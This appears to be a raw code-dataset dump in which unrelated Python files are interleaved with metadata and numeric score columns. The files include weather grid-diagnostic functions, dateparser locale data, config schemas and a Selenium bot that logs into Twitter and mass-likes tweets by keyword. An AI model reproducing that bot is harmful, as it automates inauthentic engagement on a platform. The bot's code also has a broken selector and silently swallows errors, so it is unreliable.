names: parts.append('%s: (%s)' % (self.name_field, ' OR '.join(names))) if tags: parts.append('%s: (%s)' % (self.tag_field, ' OR '.join(tags))) # Don't return cards that other users have marked private... privacy = '%s: 0' % self.private_field if self.user_key: # ... but always show the user their own cards in results. privacy += ' OR %s: (%s)' % (self.user_key_field, self.user_key) parts.append('(' + privacy + ')') return ' AND '.join(parts) def query(self): query = search.Query( query_string=self._build_query_string(), options=self.query_options) return query
37.035714
81
0.667998
993
7,259
4.728097
0.277946
0.025346
0.024281
0.012141
0.083493
0.034292
0.021086
0
0
0
0
0.005597
0.236947
7,259
195
82
37.225641
0.842029
0.402673
0
0.05
0
0
0.045155
0
0
0
0
0.010256
0.01
1
0.1
false
0
0.03
0.01
0.21
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
d5e30ec5517ff0e5f54798d022557ddc8306de32
445
py
Python
custom_components/vaddio_conferenceshot/const.py
rohankapoorcom/vaddio_conferenceshot
71744710df10f77e21e9e7568e3f6c7175b0d11d
[ "Apache-2.0" ]
null
null
null
custom_components/vaddio_conferenceshot/const.py
rohankapoorcom/vaddio_conferenceshot
71744710df10f77e21e9e7568e3f6c7175b0d11d
[ "Apache-2.0" ]
null
null
null
custom_components/vaddio_conferenceshot/const.py
rohankapoorcom/vaddio_conferenceshot
71744710df10f77e21e9e7568e3f6c7175b0d11d
[ "Apache-2.0" ]
null
null
null
import voluptuous as vol import homeassistant.helpers.config_validation as cv from homeassistant.const import CONF_HOST, CONF_PASSWORD, CONF_PATH, CONF_USERNAME DOMAIN = "vaddio_conferenceshot" DATA_SCHEMA = vol.Schema( { vol.Required(CONF_HOST): cv.string, vol.Required(CONF_USERNAME): cv.string, vol.Required(CONF_PASSWORD): cv.string, } ) SERVICE_RECALL_PRESET = "move_to_preset" ATTR_PRESET_ID = "preset"
24.722222
82
0.750562
58
445
5.482759
0.517241
0.103774
0.141509
0.119497
0.144654
0
0
0
0
0
0
0
0.161798
445
17
83
26.176471
0.852547
0
0
0
0
0
0.092135
0.047191
0
0
0
0
0
1
0
false
0.153846
0.230769
0
0.230769
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
d5e4c8d6143747e9fa0113815e838834d857b208
1,022
py
Python
example/shovel/bar.py
demiurgestudios/shovel
3db497164907d3765fae182959147d19064671c7
[ "MIT" ]
202
2015-01-12T13:47:29.000Z
2022-02-09T19:13:36.000Z
example/shovel/bar.py
demiurgestudios/shovel
3db497164907d3765fae182959147d19064671c7
[ "MIT" ]
14
2017-04-09T17:04:53.000Z
2021-05-16T11:08:34.000Z
example/shovel/bar.py
demiurgestudios/shovel
3db497164907d3765fae182959147d19064671c7
[ "MIT" ]
22
2015-09-11T18:35:10.000Z
2021-05-16T11:04:56.000Z
from shovel import task @task def hello(name='Foo'): '''Prints "Hello, " followed by the provided name. Examples: shovel bar.hello shovel bar.hello --name=Erin http://localhost:3000/bar.hello?Erin''' print('Hello, %s' % name) @task def args(*args): '''Echos back all the args you give it. This exists mostly to demonstrate the fact that shovel is compatible with variable argument functions. Examples: shovel bar.args 1 2 3 4 http://localhost:3000/bar.args?1&2&3&4''' for arg in args: print('You said "%s"' % arg) @task def kwargs(**kwargs): '''Echos back all the kwargs you give it. This exists mostly to demonstrate that shovel is compatible with the keyword argument functions. Examples: shovel bar.kwargs --foo=5 --bar 5 --howdy hey http://localhost:3000/bar.kwargs?foo=5&bar=5&howdy=hey''' for key, val in kwargs.items(): print('You said "%s" => "%s"' % (key, val))
27.621622
65
0.614481
148
1,022
4.243243
0.385135
0.057325
0.08121
0.095541
0.417197
0.235669
0.200637
0.200637
0
0
0
0.031788
0.261252
1,022
37
66
27.621622
0.8
0.619374
0
0.25
0
0
0.154362
0
0
0
0
0
0
1
0.25
false
0
0.083333
0
0.333333
0.25
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
d5eff585130a0defb51fd844556d3dea1143c55d
18,862
py
Python
src/ucar/unidata/idv/resources/python/griddiag.py
JessicaWiedemeier/IDV
e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64
[ "CNRI-Jython" ]
1
2021-06-09T11:24:48.000Z
2021-06-09T11:24:48.000Z
src/ucar/unidata/idv/resources/python/griddiag.py
JessicaWiedemeier/IDV
e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64
[ "CNRI-Jython" ]
null
null
null
src/ucar/unidata/idv/resources/python/griddiag.py
JessicaWiedemeier/IDV
e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64
[ "CNRI-Jython" ]
null
null
null
""" This is the doc for the Grid Diagnostics module. These functions are based on the grid diagnostics from the GEneral Meteorological PAcKage (GEMPAK). Note that the names are case sensitive and some are named slightly different from GEMPAK functions to avoid conflicts with Jython built-ins (e.g. str). <P> In the following operators, scalar operands are named S<sub>n</sub> and vector operands are named V<sub>n</sub>. Lowercase u and v refer to the grid relative components of a vector. """ def GRAVITY(): """ Gravity constant """ return DerivedGridFactory.GRAVITY; # Math functions def atn2(S1,S2,WA=0): """ Wrapper for atan2 built-in <div class=jython> ATN2 (S1, S2) = ATAN ( S1 / S2 )<br> WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR) </div> """ return GridMath.atan2(S1,S2,WA) def add(S1,S2,WA=0): """ Addition <div class=jython> ADD (S1, S2) = S1 + S2<br> WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR) </div> """ return GridMath.add(S1,S2,WA) def mul(S1,S2,WA=0): """ Multiply <div class=jython> MUL (S1, S2) = S1 * S2<br> WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR) </div> """ return GridMath.multiply(S1,S2,WA) def quo(S1,S2,WA=0): """ Divide <div class=jython> QUO (S1, S2) = S1 / S2<br> WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR) </div> """ return GridMath.divide(S1,S2,WA) def sub(S1,S2,WA=0): """ Subtract <div class=jython> SUB (S1, S2) = S1 - S2<br> WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR) </div> """ return GridMath.subtract(S1,S2,WA) # Scalar quantities def adv(S,V): """ Horizontal Advection, negative by convention <div class=jython> ADV ( S, V ) = - ( u * DDX (S) + v * DDY (S) ) </div> """ return -add(mul(ur(V),ddx(S)),mul(vr(V),ddy(S))) def avg(S1,S2): """ Average of 2 scalars <div class=jython> AVG (S1, S2) = ( S1 + S2 ) / 2 </div> """ return add(S1,S2)/2 def avor(V): """ Absolute Vorticity <div class=jython> AVOR ( V ) = VOR ( V ) + CORL(V) </div> """ relv = vor(V) return add(relv,corl(relv)) def circs(S, D=2): """ <div class=jython> Apply a circular aperature smoothing to the grid points. The weighting function is the circular aperature diffraction function. D is the radius of influence in grid increments, increasing D increases the smoothing. (default D=2) </div> """ return GridUtil.smooth(S, "CIRC", int(D)) def corl(S): """ Coriolis Parameter for all points in a grid <div class=jython> CORL = TWO_OMEGA*sin(latr) </div> """ return DerivedGridFactory.createCoriolisGrid(S) def cress(S, D=2): """ <div class=jython> Apply a Cressman smoothing to the grid points. The smoothed value is given by a weighted average of surrounding grid points. D is the radius of influence in grid increments, increasing D increases the smoothing. (default D=2) </div> """ return GridUtil.smooth(S, "CRES", int(D)) def cros(V1,V2): """ Vector cross product magnitude <div class=jython> CROS ( V1, V2 ) = u1 * v2 - u2 * v1 </div> """ return sub(mul(ur(V1),vr(V2)),mul(ur(V2),vr(V1))) def ddx(S): """ Take the derivative with respect to the domain's X coordinate """ return GridMath.ddx(S); def ddy(S): """ Take the derivative with respect to the domain's Y coordinate """ return GridMath.ddy(S); def defr(V): """ Total deformation <div class=jython> DEF ( V ) = ( STRD (V) ** 2 + SHR (V) ** 2 ) ** .5 </div> """ return mag(strd(V),shr(V)) def div(V): """ Horizontal Divergence <div class=jython> DIV ( V ) = DDX ( u ) + DDY ( v ) </div> """ return add(ddx(ur(V)),ddy(vr(V))) def dirn(V): """ North relative direction of a vector <div class=jython> DIRN ( V ) = DIRR ( un(v), vn(v) ) </div> """ return dirr(DerivedGridFactory.createTrueFlowVector(V)) def dirr(V): """ Grid relative direction of a vector """ return DerivedGridFactory.createVectorDirection(V) def dot(V1,V2): """ Vector dot product <div class=jython> DOT ( V1, V2 ) = u1 * u2 + v1 * v2 </div> """ product = mul(V1,V2) return add(ur(product),vr(product)) def gwfs(S, N=6): """ <div class=jython> Horizontal smoothing using normally distributed weights with theoretical response of 1/e for N * delta-x wave. Increasing N increases the smoothing. (default N=6) </div> """ return GridUtil.smooth(S, "GWFS", int(N)) def jcbn(S1,S2): """ Jacobian Determinant <div class=jython> JCBN ( S1, S2 ) = DDX (S1) * DDY (S2) - DDY (S1) * DDX (S2) </div> """ return sub(mul(ddx(S1),ddy(S2)),mul(ddy(S1),ddx(S2))) def latr(S): """ Latitudue all points in a grid """ return DerivedGridFactory.createLatitudeGrid(S) def lap(S): """ Laplacian operator <div class=jython> LAP ( S ) = DIV ( GRAD (S) ) </div> """ grads = grad(S) return div(grads) def lav(S,level1=None,level2=None, unit=None): """ Layer Average of a multi layer grid <div class=jython> LAV ( S ) = ( S (level1) + S (level2) ) / 2. </div> """ if level1 == None: return GridMath.applyFunctionOverLevels(S, GridMath.FUNC_AVERAGE) else: return layerAverage(S,level1,level2, unit) def ldf(S,level1,level2, unit=None): """ Layer Difference <div class=jython> LDF ( S ) = S (level1) - S (level2) </div> """ return layerDiff(S,level1,level2, unit); def mag(*a): """ Magnitude of a vector """ if (len(a) == 1): return DerivedGridFactory.createVectorMagnitude(a[0]); else: return DerivedGridFactory.createVectorMagnitude(a[0],a[1]); def mixr(temp,rh): """ Mixing Ratio from Temperature, RH (requires pressure domain) """ return DerivedGridFactory.createMixingRatio(temp,rh) def relh(temp,mixr): """ Create Relative Humidity from Temperature, mixing ratio (requires pressure domain) """ return DerivedGridFactory.createRelativeHumidity(temp,mixr) def pvor(S,V): """ Potetial Vorticity (usually from theta and wind) """ return DerivedGridFactory.createPotentialVorticity(S,V) def rects(S, D=2): """ <div class=jython> Apply a rectangular aperature smoothing to the grid points. The weighting function is the product of the rectangular aperature diffraction function in the x and y directions. D is the radius of influence in grid increments, increasing D increases the smoothing. (default D=2) </div> """ return GridUtil.smooth(S, "RECT", int(D)) def savg(S): """ Average over whole grid <div class=jython> SAVG ( S ) = average of all non-missing grid point values </div> """ return GridMath.applyFunctionToLevels(S, GridMath.FUNC_AVERAGE) def savs(S): """ Average over grid subset <div class=jython> SAVS ( S ) = average of all non-missing grid point values in the subset area </div> """ return savg(S) def sdiv(S,V): """ Horizontal Flux Divergence <div class=jython> SDIV ( S, V ) = S * DIV ( V ) + DOT ( V, GRAD ( S ) ) </div> """ return add(mul(S,(div(V))) , dot(V,grad(S))) def shr(V): """ Shear Deformation <div class=jython> SHR ( V ) = DDX ( v ) + DDY ( u ) </div> """ return add(ddx(vr(V)),ddy(ur(V))) def sm5s(S): """ Smooth a scalar grid using a 5-point smoother <div class=jython> SM5S ( S ) = .5 * S (i,j) + .125 * ( S (i+1,j) + S (i,j+1) + S (i-1,j) + S (i,j-1) ) </div> """ return GridUtil.smooth(S, "SM5S") def sm9s(S): """ Smooth a scalar grid using a 9-point smoother <div class=jython> SM9S ( S ) = .25 * S (i,j) + .125 * ( S (i+1,j) + S (i,j+1) + S (i-1,j) + S (i,j-1) ) + .0625 * ( S (i+1,j+1) + S (i+1,j-1) + S (i-1,j+1) + S (i-1,j-1) ) </div> """ return GridUtil.smooth(S, "SM9S") def strd(V): """ Stretching Deformation <div class=jython> STRD ( V ) = DDX ( u ) - DDY ( v ) </div> """ return sub(ddx(ur(V)),ddy(vr(V))) def thta(temp): """ Potential Temperature from Temperature (requires pressure domain) """ return DerivedGridFactory.createPotentialTemperature(temp) def thte(temp,rh): """ Equivalent Potential Temperature from Temperature and Relative humidity (requires pressure domain) """ return DerivedGridFactory.createEquivalentPotentialTemperature(temp,rh) def un(V): """ North relative u component """ return ur(DerivedGridFactory.createTrueFlowVector(V)) def ur(V): """ Grid relative u component """ return DerivedGridFactory.getUComponent(V) def vn(V): """ North relative v component """ return vr(DerivedGridFactory.createTrueFlowVector(V)) def vor(V): """ Relative Vorticity <div class=jython> VOR ( V ) = DDX ( v ) - DDY ( u ) </div> """ return sub(ddx(vr(V)),ddy(ur(V))) def vr(V): """ Grid relative v component """ return DerivedGridFactory.getVComponent(V) def xav(S): """ Average along a grid row <div class=jython> XAV (S) = ( S (X1) + S (X2) + ... + S (KXD) ) / KNT KXD = number of points in row KNT = number of non-missing points in row XAV for a row is stored at every point in that row. </div> """ return GridMath.applyFunctionToAxis(S, GridMath.FUNC_AVERAGE, GridMath.AXIS_X) def xsum(S): """ Sum along a grid row <div class=jython> XSUM (S) = ( S (X1) + S (X2) + ... + S (KXD) ) KXD = number of points in row XSUM for a row is stored at every point in that row. </div> """ return GridMath.applyFunctionToAxis(S, GridMath.FUNC_SUM, GridMath.AXIS_X) def yav(S): """ Average along a grid column <div class=jython> YAV (S) = ( S (Y1) + S (Y2) + ... + S (KYD) ) / KNT KYD = number of points in column KNT = number of non-missing points in column </div> """ return GridMath.applyFunctionToAxis(S, GridMath.FUNC_AVERAGE, GridMath.AXIS_Y) def ysum(S): """ Sum along a grid column <div class=jython> YSUM (S) = ( S (Y1) + S (Y2) + ... + S (KYD) ) KYD = number of points in row YSUM for a column is stored at every point in that column. </div> """ return GridMath.applyFunctionToAxis(S, GridMath.FUNC_SUM, GridMath.AXIS_Y) def zav(S): """ Average across the levels of a grid at all points <div class=jython> ZAV (S) = ( S (Z1) + S (Z2) + ... + S (KZD) ) / KNT KZD = number of levels KNT = number of non-missing points in column </div> """ return GridMath.applyFunctionToLevels(S, GridMath.FUNC_AVERAGE) def zsum(S): """ Sum across the levels of a grid at all points <div class=jython> ZSUM (S) = ( S (Z1) + S (Z2) + ... + S (KZD) ) KZD = number of levels ZSUM for a vertical column is stored at every point </div> """ return GridMath.applyFunctionOverLevels(S, GridMath.FUNC_SUM) def wshr(V, Z, top, bottom): """ Magnitude of the vertical wind shear in a layer <div class=jython> WSHR ( V ) = MAG [ VLDF (V) ] / LDF (Z) </div> """ dv = mag(vldf(V,top,bottom)) dz = ldf(Z,top,bottom) return quo(dv,dz) # Vector output def age(obs,geo): """ Ageostrophic wind <div class=jython> AGE ( S ) = [ u (OBS) - u (GEO(S)), v (OBS) - v (GEO(S)) ] </div> """ return sub(obs,geo) def circv(S, D=2): """ <div class=jython> Apply a circular aperature smoothing to the grid points. The weighting function is the circular aperature diffraction function. D is the radius of influence in grid increments, increasing D increases the smoothing. (default D=2) </div> """ return GridUtil.smooth(S, "CIRC", int(D)) def cresv(S, D=2): """ <div class=jython> Apply a Cressman smoothing to the grid points. The smoothed value is given by a weighted average of surrounding grid points. D is the radius of influence in grid increments, increasing D increases the smoothing. (default D=2) </div> """ return GridUtil.smooth(S, "CRES", int(D)) def dvdx(V): """ Partial x derivative of a vector <div class=jython> DVDX ( V ) = [ DDX (u), DDX (v) ] </div> """ return vecr(ddx(ur(V)), ddx(vr(V))) def dvdy(V): """ Partial x derivative of a vector <div class=jython> DVDY ( V ) = [ DDY (u), DDY (v) ] </div> """ return vecr(ddy(ur(V)), ddy(vr(V))) def frnt(S,V): """ Frontogenesis function from theta and the wind <div class=jython> FRNT ( THTA, V ) = 1/2 * MAG ( GRAD (THTA) ) * ( DEF * COS (2 * BETA) - DIV ) <p> Where: BETA = ASIN ( (-DDX (THTA) * COS (PSI) <br> - DDY (THTA) * SIN (PSI))/ <br> MAG ( GRAD (THTA) ) ) <br> PSI = 1/2 ATAN2 ( SHR / STR ) <br> </div> """ shear = shr(V) strch = strd(V) psi = .5*atn2(shear,strch) dxt = ddx(S) dyt = ddy(S) cosd = cos(psi) sind = sin(psi) gradt = grad(S) mgradt = mag(gradt) a = -cosd*dxt-sind*dyt beta = asin(a/mgradt) frnto = .5*mgradt*(defr(V)*cos(2*beta)-div(V)) return frnto def geo(z): """ geostrophic wind from height <div class=jython> GEO ( S ) = [ - DDY (S) * const / CORL, DDX (S) * const / CORL ] </div> """ return DerivedGridFactory.createGeostrophicWindVector(z) def grad(S): """ Gradient of a scalar <div class=jython> GRAD ( S ) = [ DDX ( S ), DDY ( S ) ] </div> """ return vecr(ddx(S),ddy(S)) def gwfv(V, N=6): """ <div class=jython> Horizontal smoothing using normally distributed weights with theoretical response of 1/e for N * delta-x wave. Increasing N increases the smoothing. (default N=6) </div> """ return gwfs(V, N) def inad(V1,V2): """ Inertial advective wind <div class=jython> INAD ( V1, V2 ) = [ DOT ( V1, GRAD (u2) ), DOT ( V1, GRAD (v2) ) ] </div> """ return vecr(dot(V1,grad(ur(V2))),dot(V1,grad(vr(V2)))) def qvec(S,V): """ Q-vector at a level ( K / m / s ) <div class=jython> QVEC ( S, V ) = [ - ( DOT ( DVDX (V), GRAD (S) ) ), - ( DOT ( DVDY (V), GRAD (S) ) ) ] where S can be any thermal paramenter, usually THTA. </div> """ grads = grad(S) qvecu = newName(-dot(dvdx(V),grads),"qvecu") qvecv = newName(-dot(dvdy(V),grads),"qvecv") return vecr(qvecu,qvecv) def qvcl(THTA,V): """ Q-vector ( K / m / s ) <div class=jython> QVCL ( THTA, V ) = ( 1/( D (THTA) / DP ) ) * [ ( DOT ( DVDX (V), GRAD (THTA) ) ), ( DOT ( DVDY (V), GRAD (THTA) ) ) ] </div> """ dtdp = GridMath.partial(THTA,2) gradt = grad(THTA) qvecudp = newName(quo(dot(dvdx(V),gradt),dtdp),"qvecudp") qvecvdp = newName(quo(dot(dvdy(V),gradt),dtdp),"qvecvdp") return vecr(qvecudp,qvecvdp) def rectv(S, D=2): """ <div class=jython> Apply a rectangular aperature smoothing to the grid points. The weighting function is the product of the rectangular aperature diffraction function in the x and y directions. D is the radius of influence in grid increments, increasing D increases the smoothing. (default D=2) </div> """ return GridUtil.smooth(S, "RECT", int(D)) def sm5v(V): """ Smooth a scalar grid using a 5-point smoother (see sm5s) """ return sm5s(V) def sm9v(V): """ Smooth a scalar grid using a 9-point smoother (see sm9s) """ return sm9s(V) def thrm(S, level1, level2, unit=None): """ Thermal wind <div class=jython> THRM ( S ) = [ u (GEO(S)) (level1) - u (GEO(S)) (level2), v (GEO(S)) (level1) - v (GEO(S)) (level2) ] </div> """ return vldf(geo(S),level1,level2, unit) def vadd(V1,V2): """ add the components of 2 vectors <div class=jython> VADD (V1, V2) = [ u1+u2, v1+v2 ] </div> """ return add(V1,V2) def vecn(S1,S2): """ Make a true north vector from two components <div class=jython> VECN ( S1, S2 ) = [ S1, S2 ] </div> """ return makeTrueVector(S1,S2) def vecr(S1,S2): """ Make a vector from two components <div class=jython> VECR ( S1, S2 ) = [ S1, S2 ] </div> """ return makeVector(S1,S2) def vlav(V,level1,level2, unit=None): """ calculate the vector layer average <div class=jython> VLDF(V) = [(u(level1) - u(level2))/2, (v(level1) - v(level2))/2] </div> """ return layerAverage(V, level1, level2, unit) def vldf(V,level1,level2, unit=None): """ calculate the vector layer difference <div class=jython> VLDF(V) = [u(level1) - u(level2), v(level1) - v(level2)] </div> """ return layerDiff(V,level1,level2, unit) def vmul(V1,V2): """ Multiply the components of 2 vectors <div class=jython> VMUL (V1, V2) = [ u1*u2, v1*v2 ] </div> """ return mul(V1,V2) def vquo(V1,V2): """ Divide the components of 2 vectors <div class=jython> VQUO (V1, V2) = [ u1/u2, v1/v2 ] </div> """ return quo(V1,V2) def vsub(V1,V2): """ subtract the components of 2 vectors <div class=jython> VSUB (V1, V2) = [ u1-u2, v1-v2 ] </div> """ return sub(V1,V2) def LPIndex(u, v, z, t, top, bottom, unit): """ calculate the wind shear between discrete layers <div class=jython> LP = 7.268DUDZ + 0.718DTDN + 0.318DUDN - 2.52 </div> """ Z = windShear(u, v, z, top, bottom, unit)*7.268 uwind = getSliceAtLevel(u, top) vwind = getSliceAtLevel(v, top) temp = newUnit(getSliceAtLevel(t, top), "temperature", "celsius") HT = sqrt(ddx(temp)*ddx(temp) + ddy(temp)*ddy(temp))*0.718 HU = (ddx(vwind) + ddy(uwind))*0.318 L = add(noUnit(Z), add(noUnit(HU), noUnit(HT))) L = (L - 2.520)*(-0.59) P= 1.0/(1.0 + GridMath.applyFunctionOverGridsExt(L,"exp")) LP = setLevel(P ,top, unit) return LP def EllrodIndex(u, v, z, top, bottom, unit): """ calculate the wind shear between discrete layers <div class=jython> EI = VWS X ( DEF + DIV) </div> """ VWS = windShear(u, v, z, top, bottom, unit)*100.0 # uwind = getSliceAtLevel(u, top) vwind = getSliceAtLevel(v, top) DIV = (ddx(uwind) + ddy(vwind))* (-1.0) # DSH = ddx(vwind) + ddy(uwind) DST = ddx(uwind) - ddy(vwind) DEF = sqrt(DSH * DSH + DST * DST) EI = mul(noUnit(VWS), add(noUnit(DEF), noUnit(DIV))) return setLevel(EI, top, unit)
26.75461
89
0.584721
2,684
18,862
4.100596
0.152385
0.044339
0.077594
0.018808
0.494821
0.429675
0.404052
0.350809
0.320462
0.276576
0
0.024786
0.264182
18,862
704
90
26.792614
0.768211
0.590658
0
0.078431
0
0
0.012306
0
0
0
0
0
0
1
0.382353
false
0
0
0
0.77451
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
d5effb4acc4b4904be8e5099e47cd060230843fe
2,376
py
Python
app.py
DevilBit/Twitter-Bot
6f1b285aeb5faf37906d575775a927e69a5321d6
[ "MIT" ]
null
null
null
app.py
DevilBit/Twitter-Bot
6f1b285aeb5faf37906d575775a927e69a5321d6
[ "MIT" ]
null
null
null
app.py
DevilBit/Twitter-Bot
6f1b285aeb5faf37906d575775a927e69a5321d6
[ "MIT" ]
1
2021-03-08T20:05:23.000Z
2021-03-08T20:05:23.000Z
from selenium import webdriver #to get the browser from selenium.webdriver.common.keys import Keys #to send key to browser import getpass #to get password safely import time #to pause the program #a calss to store all twetter related objects and functions class twitter_bot: def __init__(self, username, password): self.username = username self.password = password self.bot = webdriver.Firefox() #login function def login(self): bot = self.bot bot.get('https://twitter.com/login') #sleep to wait for the browser to get the website time.sleep(3) email = bot.find_element_by_class_name('js-username-field') #get the email field password = bot.find_element_by_class_name('js-password-field') #get the password field #clear the email and password field just in case of autofill email.clear() password.clear() #fill in email field email.send_keys(self.username) time.sleep(2) #fill in password field password.send_keys(self.password) time.sleep(2) #click the login button bot.find_element_by_class_name("EdgeButtom--medium").click() time.sleep(3) def like_tweet(self, search): bot = self.bot #use keyword to search bot.get('https://twitter.com/search?q=' + search + '&src=typd') bot.implicitly_wait(3) #get posts for i in range(0, 30): bot.execute_script('window.scrollTo(0, document.body.scrollHeight)') time.sleep(10) tweets = bot.find_elements_by_class_name('tweet') links = [element.get_attribute('data-permalink-path') for element in tweets] #like posts for link in links: bot.get('https://twitter.com/' + link) try: bot.find_element_by_class_name('HeartAnimation').click() time.sleep(10) except Exception as ex: time.sleep(60) if __name__ == '__main__': username = input('Email: ') password = getpass.getpass('Password: ') search = input('Please enter keyword: ') user = twitter_bot(username, password) user.login() time.sleep(10) user.like_tweet(search)
34.941176
95
0.603114
295
2,376
4.718644
0.359322
0.051724
0.039511
0.045977
0.119971
0.074713
0.038793
0
0
0
0
0.010241
0.301347
2,376
67
96
35.462687
0.828313
0.170875
0
0.191489
0
0
0.140964
0.014308
0
0
0
0
0
1
0.06383
false
0.170213
0.085106
0
0.170213
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
d5fb061a3a4378d9720ff3a451d5983678f6ed08
2,712
py
Python
venv/lib/python3.8/site-packages/dateparser/data/date_translation_data/ebu.py
yuta-komura/vishnu
67173b674d5f4f3be189474103612447ef69ab44
[ "MIT" ]
1
2021-11-17T04:55:14.000Z
2021-11-17T04:55:14.000Z
dateparser/data/date_translation_data/ebu.py
cool-RR/dateparser
c38336df521cc57d947dc2c9111539a72f801652
[ "BSD-3-Clause" ]
null
null
null
dateparser/data/date_translation_data/ebu.py
cool-RR/dateparser
c38336df521cc57d947dc2c9111539a72f801652
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- info = { "name": "ebu", "date_order": "DMY", "january": [ "mweri wa mbere", "mbe" ], "february": [ "mweri wa kaĩri", "kai" ], "march": [ "mweri wa kathatũ", "kat" ], "april": [ "mweri wa kana", "kan" ], "may": [ "mweri wa gatano", "gat" ], "june": [ "mweri wa gatantatũ", "gan" ], "july": [ "mweri wa mũgwanja", "mug" ], "august": [ "mweri wa kanana", "knn" ], "september": [ "mweri wa kenda", "ken" ], "october": [ "mweri wa ikũmi", "iku" ], "november": [ "mweri wa ikũmi na ũmwe", "imw" ], "december": [ "mweri wa ikũmi na kaĩrĩ", "igi" ], "monday": [ "njumatatu", "tat" ], "tuesday": [ "njumaine", "ine" ], "wednesday": [ "njumatano", "tan" ], "thursday": [ "aramithi", "arm" ], "friday": [ "njumaa", "maa" ], "saturday": [ "njumamothii", "nmm" ], "sunday": [ "kiumia", "kma" ], "am": [ "ki" ], "pm": [ "ut" ], "year": [ "mwaka" ], "month": [ "mweri" ], "week": [ "kiumia" ], "day": [ "mũthenya" ], "hour": [ "ithaa" ], "minute": [ "ndagĩka" ], "second": [ "sekondi" ], "relative-type": { "1 year ago": [ "last year" ], "0 year ago": [ "this year" ], "in 1 year": [ "next year" ], "1 month ago": [ "last month" ], "0 month ago": [ "this month" ], "in 1 month": [ "next month" ], "1 week ago": [ "last week" ], "0 week ago": [ "this week" ], "in 1 week": [ "next week" ], "1 day ago": [ "ĩgoro" ], "0 day ago": [ "ũmũnthĩ" ], "in 1 day": [ "rũciũ" ], "0 hour ago": [ "this hour" ], "0 minute ago": [ "this minute" ], "0 second ago": [ "now" ] }, "locale_specific": {}, "skip": [ " ", ".", ",", ";", "-", "/", "'", "|", "@", "[", "]", "," ] }
15.859649
34
0.289823
188
2,712
4.170213
0.537234
0.107143
0.045918
0.035714
0
0
0
0
0
0
0
0.012559
0.530236
2,712
170
35
15.952941
0.602826
0.007743
0
0.248521
0
0
0.31759
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
d5fcff660972d9337742f70ae81e7f0f26eaadac
310
py
Python
setup.py
martinfarrow/awspk
c3b5f8ede44ca96473b95f52ddb2291a45828565
[ "MIT" ]
null
null
null
setup.py
martinfarrow/awspk
c3b5f8ede44ca96473b95f52ddb2291a45828565
[ "MIT" ]
null
null
null
setup.py
martinfarrow/awspk
c3b5f8ede44ca96473b95f52ddb2291a45828565
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 from setuptools import setup, find_packages setup(name='awspk', version='0.1', description='A aws cli pen knife with loads of interested stuff', author='Martin Farrow', author_email='[email protected]', py_modules=['awspk'], license='LICENSE', )
23.846154
71
0.651613
40
310
4.975
0.875
0
0
0
0
0
0
0
0
0
0
0.012346
0.216129
310
12
72
25.833333
0.806584
0.067742
0
0
0
0
0.34375
0
0
0
0
0
0
1
0
true
0
0.111111
0
0.111111
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
911891456d9e7cb41632224dd81128e9e0fa9e6b
2,776
py
Python
observations/r/bomsoi.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
199
2017-07-24T01:34:27.000Z
2022-01-29T00:50:55.000Z
observations/r/bomsoi.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
46
2017-09-05T19:27:20.000Z
2019-01-07T09:47:26.000Z
observations/r/bomsoi.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
45
2017-07-26T00:10:44.000Z
2022-03-16T20:44:59.000Z
# -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import csv import numpy as np import os import sys from observations.util import maybe_download_and_extract def bomsoi(path): """Southern Oscillation Index Data The Southern Oscillation Index (SOI) is the difference in barometric pressure at sea level between Tahiti and Darwin. Annual SOI and Australian rainfall data, for the years 1900-2001, are given. Australia's annual mean rainfall is an area-weighted average of the total annual precipitation at approximately 370 rainfall stations around the country. This data frame contains the following columns: Year a numeric vector Jan average January SOI values for each year Feb average February SOI values for each year Mar average March SOI values for each year Apr average April SOI values for each year May average May SOI values for each year Jun average June SOI values for each year Jul average July SOI values for each year Aug average August SOI values for each year Sep average September SOI values for each year Oct average October SOI values for each year Nov average November SOI values for each year Dec average December SOI values for each year SOI a numeric vector consisting of average annual SOI values avrain a numeric vector consisting of a weighted average annual rainfall at a large number of Australian sites NTrain Northern Territory rain northRain north rain seRain southeast rain eastRain east rain southRain south rain swRain southwest rain Australian Bureau of Meteorology web pages: http://www.bom.gov.au/climate/change/rain02.txt and http://www.bom.gov.au/climate/current/soihtm1.shtml Args: path: str. Path to directory which either stores file or otherwise file will be downloaded and extracted there. Filename is `bomsoi.csv`. Returns: Tuple of np.ndarray `x_train` with 106 rows and 21 columns and dictionary `metadata` of column headers (feature names). """ import pandas as pd path = os.path.expanduser(path) filename = 'bomsoi.csv' if not 